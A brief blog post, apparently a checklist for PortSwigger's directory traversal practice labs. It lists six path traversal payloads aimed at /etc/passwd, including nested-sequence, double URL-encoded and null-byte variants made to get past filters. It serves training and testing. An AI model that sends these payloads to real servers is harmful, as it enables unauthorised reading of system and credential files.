PortSwigger - Directory Traversal - Mystery Labs Checklist

Posted Jun 10, 2024 Updated Oct 26, 2024

By Jaco Zwarts 1 min read

1. Use basic directory traversal:

../../../../etc/passwd

2. Use absolute path:

/etc/passwd

3. Use recursion:

..././..././..././..././etc/passwd

4. Use double url encoding

%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34 

5. Use start of path:

/var/www/images/../../../../etc/passwd

6. Use null byte:

../../../etc/passwd%00123.png

PortSwigger

This post is licensed under CC BY 4.0 by the author.

1. Use basic directory traversal:

2. Use absolute path:

3. Use recursion:

4. Use double url encoding

5. Use start of path:

6. Use null byte:

Trending Tags